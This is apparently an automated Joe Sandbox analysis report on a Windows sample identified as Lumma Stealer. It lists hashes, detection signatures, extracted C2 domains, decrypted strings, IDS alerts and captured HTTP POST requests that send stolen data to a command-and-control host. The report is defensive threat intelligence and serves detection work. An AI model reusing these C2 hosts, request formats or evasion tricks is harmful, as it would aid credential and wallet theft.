Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NewI Upd v1.1.0.exe

Overview

General Information

Sample name:NewI Upd v1.1.0.exe
Analysis ID:1581123
MD5:f186a87680772f195f865cedab080b6d
SHA1:3eae87351603339cb281f0f89722e5b5238d476d
SHA256:fc07dfae95323c988627ac7e858d37dd165e34b25d5c2a00705caf8fea594e01
Tags:exeLummaStealeruser-ventoy
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • NewI Upd v1.1.0.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\NewI Upd v1.1.0.exe" MD5: F186A87680772F195F865CEDAB080B6D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["bashfulacid.lat", "manyrestro.lat", "talkynicer.lat", "tentabatte.lat", "slipperyloo.lat", "curverpluch.lat", "wordyfindy.lat", "begguinnerz.biz", "shapestickyr.lat"], "Build id": "HpOoIh--3fe7f419a360"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.3109623142.000000000196B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.3179555778.00000000017B0000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          Process Memory Space: NewI Upd v1.1.0.exe PID: 6648JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: NewI Upd v1.1.0.exe PID: 6648JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: NewI Upd v1.1.0.exe PID: 6648JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                0.2.NewI Upd v1.1.0.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T03:03:10.424698+010020283713Unknown Traffic192.168.2.449883172.67.190.223443TCP
                  2024-12-27T03:03:12.520456+010020283713Unknown Traffic192.168.2.449889172.67.190.223443TCP
                  2024-12-27T03:03:15.056791+010020283713Unknown Traffic192.168.2.449895172.67.190.223443TCP
                  2024-12-27T03:03:17.385054+010020283713Unknown Traffic192.168.2.449902172.67.190.223443TCP
                  2024-12-27T03:03:19.610771+010020283713Unknown Traffic192.168.2.449907172.67.190.223443TCP
                  2024-12-27T03:03:22.349274+010020283713Unknown Traffic192.168.2.449914172.67.190.223443TCP
                  2024-12-27T03:03:24.433081+010020283713Unknown Traffic192.168.2.449920172.67.190.223443TCP
                  2024-12-27T03:03:27.179953+010020283713Unknown Traffic192.168.2.449926172.67.190.223443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T03:03:11.195565+010020546531A Network Trojan was detected192.168.2.449883172.67.190.223443TCP
                  2024-12-27T03:03:13.311805+010020546531A Network Trojan was detected192.168.2.449889172.67.190.223443TCP
                  2024-12-27T03:03:27.935946+010020546531A Network Trojan was detected192.168.2.449926172.67.190.223443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T03:03:11.195565+010020498361A Network Trojan was detected192.168.2.449883172.67.190.223443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T03:03:13.311805+010020498121A Network Trojan was detected192.168.2.449889172.67.190.223443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T03:03:16.071033+010020480941Malware Command and Control Activity Detected192.168.2.449895172.67.190.223443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["bashfulacid.lat", "manyrestro.lat", "talkynicer.lat", "tentabatte.lat", "slipperyloo.lat", "curverpluch.lat", "wordyfindy.lat", "begguinnerz.biz", "shapestickyr.lat"], "Build id": "HpOoIh--3fe7f419a360"}
                  Source: NewI Upd v1.1.0.exeReversingLabs: Detection: 42%
                  Source: NewI Upd v1.1.0.exeVirustotal: Detection: 34%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.8% probability
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: begguinnerz.biz
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--3fe7f419a360
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004186C0 CryptUnprotectData,0_2_004186C0
                  Source: NewI Upd v1.1.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49883 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49889 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49895 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49902 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49907 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49914 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49920 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49926 version: TLS 1.2
                  Source: NewI Upd v1.1.0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Admin\Workspace\465053702\Project\Release\Project.pdb source: NewI Upd v1.1.0.exe
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00896350 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,0_2_00896350
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+6C7F40D5h]0_2_004388C0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_00423960
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then lea ecx, dword ptr [ebx+15h]0_2_00423960
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_00423960
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0042D199
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042D199
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]0_2_0040E1A0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then lea edi, dword ptr [edx+ecx]0_2_00427220
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+3CC22F9Ah]0_2_0043F230
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]0_2_0043F340
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx eax, byte ptr [edx]0_2_0040C58F
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ebx, ebp0_2_00408780
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edi, byte ptr [ecx+eax+660D65C5h]0_2_0040E7AD
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_0040E7AD
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edi, byte ptr [ecx+eax+660D65C5h]0_2_0040E7AD
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [eax], bl0_2_0040E7AD
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov edi, ecx0_2_0040E7AD
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov dword ptr [esp+0Ch], edx0_2_00418030
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_004358B0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov edx, ecx0_2_00409960
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ecx, eax0_2_00426970
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov esi, dword ptr [ebp-30h]0_2_00426970
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [edi], 00000000h0_2_0042D975
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+00000118h]0_2_00418915
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ebx, eax0_2_004059F0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ebp, eax0_2_004059F0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ecx, eax0_2_004149F0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ecx, eax0_2_004149F0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov eax, dword ptr [esp+38h]0_2_004149F0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004149F0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000002A8h]0_2_00419981
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0041D190
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0042B190
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov edx, ecx0_2_0040B1A0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_0043C270
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx esi, byte ptr [edx]0_2_00402A10
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+03864F4Fh]0_2_0041723C
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+000000B8h]0_2_004192AB
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ebx, dword ptr [ecx+esi*4-000009BCh]0_2_00408B60
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h0_2_00422330
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+1Ch]0_2_00422330
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov dword ptr [esp+76h], 4DD55327h0_2_004243CC
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+53122F4Ah]0_2_004243CC
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0042AB80
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 385488F2h0_2_00429441
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h0_2_00416490
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1D225925h]0_2_00416490
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00416490
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then jmp dword ptr [0044568Ch]0_2_00416490
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ecx, edi0_2_00407550
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1Fh]0_2_0041BD56
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0041BD56
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-00000098h]0_2_0042DD7A
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [edx], al0_2_0042DD7A
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ecx, eax0_2_00427520
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042D53A
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00416DE6
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00416DE6
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ecx, eax0_2_00426D90
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_00422DA8
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then lea ecx, dword ptr [ebx+15h]0_2_00422DA8
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_00422DA8
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 385488F2h0_2_00429653
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov esi, dword ptr [esp+20h]0_2_0041566C
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+280C302Ah]0_2_0042A67A
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+280C302Ah]0_2_0042A67A
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2330E3DCh]0_2_00415E7F
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 120360DAh0_2_00415E7F
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-00000098h]0_2_0042DE1E
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [edx], al0_2_0042DE1E
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-18h]0_2_00429ED0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-00000098h]0_2_0042DE8A
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [edx], al0_2_0042DE8A
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov esi, dword ptr [esp+20h]0_2_0041566C
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-00000098h]0_2_0042DEA3
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [edx], al0_2_0042DEA3
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+24h]0_2_004286B5
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov edi, ecx0_2_00428F42
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0041E750
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov ecx, eax0_2_0041E750
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_0041E750
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov edx, ecx0_2_0042C70E
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov dword ptr [esi], 2120270Ch0_2_00429723
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx esi, byte ptr [ecx]0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov edx, eax0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 798ECF08h0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_004237C9
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then lea ecx, dword ptr [ebx+15h]0_2_004237C9
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_004237C9
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+00000284h]0_2_0042BFA4
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 9EB5184Bh0_2_004167AE
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then mov edx, ecx0_2_004167AE
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h0_2_004167AE
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004167AE
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004167AE

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49889 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49889 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49895 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49926 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49883 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49883 -> 172.67.190.223:443
                  Source: Malware configuration extractorURLs: bashfulacid.lat
                  Source: Malware configuration extractorURLs: manyrestro.lat
                  Source: Malware configuration extractorURLs: talkynicer.lat
                  Source: Malware configuration extractorURLs: tentabatte.lat
                  Source: Malware configuration extractorURLs: slipperyloo.lat
                  Source: Malware configuration extractorURLs: curverpluch.lat
                  Source: Malware configuration extractorURLs: wordyfindy.lat
                  Source: Malware configuration extractorURLs: begguinnerz.biz
                  Source: Malware configuration extractorURLs: shapestickyr.lat
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49889 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49902 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49895 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49914 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49926 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49883 -> 172.67.190.223:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 172.67.190.223:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: begguinnerz.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KFE639LIZR1YG3YZ5JZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18176Host: begguinnerz.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QUWCUNM037OXH2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8767Host: begguinnerz.biz
